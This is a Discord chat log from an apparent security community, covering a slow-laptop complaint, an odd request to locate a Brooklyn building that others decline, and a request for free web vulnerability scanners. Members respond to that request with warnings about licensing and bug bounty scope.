#

What can i do?

chilly veldt
chilly veldt
fading smelt
#

hi guys, why my laptop internet is being slowly even the internet was like before, what should i do to let it become faster?

clear jackal
barren lantern
sand trench
#

and if you are very special and lucky you will figure out that the wifi does not work on tuesdays

molten sky
#

0118, 999, 881, 999, 119, 725...3.

jovial musk
#

anyone understand cariddi?

#

i feel like it gives false positives lmao

fading smelt
twin ridgeBOT
#

Gave +1 Rep to @clear jackal (current: #17 - 413)

clear jackal
fading smelt
#

yeah but even when i don't use it, it takes a lot of time to load a page in google even the internet is not bad at home and this problem wasn't before

whole yew
fading smelt
#

maybe the problem could be from the settings of the router?

whole yew
#

if you don't actually take steps, at the minimum, to get some metrics, no amount of random troubleshooting will help solve your problem

#

saying "it's slow not but wasn't before" is not taking steps to actually figure anything out

fading smelt
#

yeah but the problem is i don't really understand in using laptop, so i don't have the expert to solve anything,

pallid lotus
# fading smelt yeah but the problem is i don't really understand in using laptop, so i don't ha...

Then take it to a local computer shop and let them figure it out for you.

Asking for help from strangers on the internet who don't have access to the machine isn't going to help hugely -- especially if you don't have the underlying knowledge to carry out their suggestions or understand the resulting output.
There are hundreds of things that could cause a slow network connection. We can suggest likely culprits, but we can't do anything about it -- that's something that you would need to be able to do.

sand trench
#

meep moop time for the sweet sweet sleep sloop to the beep boop

fading smelt
twin ridgeBOT
#

Gave +1 Rep to @pallid lotus (current: #9 - 770)

lavish star
#

Khaled you know what

#

I ve been doing a bit of hardware lately

#

I will help you out, dm me

#

this is not the right place to ask

#

but yk, jacked brothers gotta stay strong together

opal crow
#

Anyone from nyc?

#

I need the name of a building

jovial musk
#

hey anyone got a recomendation for a vuln scanner?

opal crow
#

But I can't find it

jovial musk
#

that creates a fake report

opal crow
#

Wdym a fake report?

#

I need to know where it is

jovial musk
#

ah

#

not to sound mean but did you try google maps?

opal crow
#

All night

#

It's in Brooklyn

clear jackal
opal crow
#

Probably east of the Brooklyn park

jovial musk
#

try asking chatgpt i guess

#

idk

opal crow
clear jackal
#

For school or work?

jovial musk
opal crow
#

For nothing I want to do it

jovial musk
#

sorry to bother lol

crude stump
opal crow
#

No school no work

#

I'm just fucking around

jovial musk
#

dude

#

in what fucking around situation do you need to know the location of a building

#

are you playing a game of trivia? like thats so specific

clear jackal
jovial musk
#

im trying cariddi but it gives so many false positives

opal crow
clear jackal
#

No, the conversation can stay here

opal crow
#

And it's close to this building

crude stump
#

Can’t help with that

jovial musk
#

geez

#

if you really want to do it, just google it

#

or keep it to yourself

#

dont publicly discuss a crime

crude stump
#

One it’s weird to begin with

opal crow
#

One it's not a crime two how do I exercise these things

jovial musk
#

like, web vuln scannner

opal crow
jovial musk
crude stump
#

Uh huh

jovial musk
#

no one does that

#

thats kinda a you thing

clear jackal
opal crow
#

Aight this is useless bye

crude stump
#

Bye ✌️

clear jackal
#

No

jovial musk
#

@crude stump do you have any recomendations?

crude stump
#

Nah sorry

jovial musk
#

😦

crude stump
#

YouTube prolly has recommendations

jovial musk
#

what do i search

#

web vuln scanner?

crude stump
#

Say

crude stump
jovial musk
#

i need a free one though

#

but aight il try

#

also, mind if i add you as a friend?

crude stump
#

I don’t really do friends sorry

#

Well

#

That sounds bad

jovial musk
#

lmao

crude stump
#

On discord I mean

jovial musk
#

yeah ikik

crude stump
#

Feel free to dm tho

clear jackal
boreal scarab
#

Jesus, I won't call out the discord. But damn people are dicks

jovial musk
clear jackal
#

You're using this for bounty I'm assuming? You're earning money, so you're going to need to look at the licenses closely.

jovial musk
#

they dont have to know its for comercial use

boreal scarab
#

I ask a question, get more insight into something: "Well did you check X or X" Like. This is discord, for discussion, don't shoo me off....

jovial musk
#

"google it"

#

like ong i already tried

clear jackal
jovial musk
whole yew
# jovial musk they dont have to know its for comercial use

You open yourself to penalties in the bug bounty program you're using, and potential liability from the company that makes the scanner. Or even prosecution, if the bug bounty program pulls your authorization and you test without compliance to the scope.

boreal scarab
jovial musk
#

web vuln scanners?

jovial musk
#

but im using it for free bug bounties

#

ones that dont pay

#

so its not commercial

whole yew
#

that does not mean you are allowed to violate the terms of the program.

jovial musk
#

dont know the terms

#

please, let me be

crude stump
#

I’m not trying to be a party pooper but doesn’t a web vuln scanner take the fun out of finding the vulnerabilities yourself?

jovial musk
#

but i would like a jump start

boreal scarab
# jovial musk web vuln scanners?

Not my area of expertise. Only tools I use for OSINT is Google, Google dorking, and some go to sites for finding further info with specific data I have

jovial musk
#

if anyone has a recomendation go right ahead please

jovial musk
boreal scarab
jovial musk
#

web vuln scanner

boreal scarab
#

Not my area of expertise, so nope

whole yew
#

Please follow the rules of the discord. You are coming close to rule #4 by basically telling us that you plan to do whatever you want, without regard to the ethics or licensing limits of tools.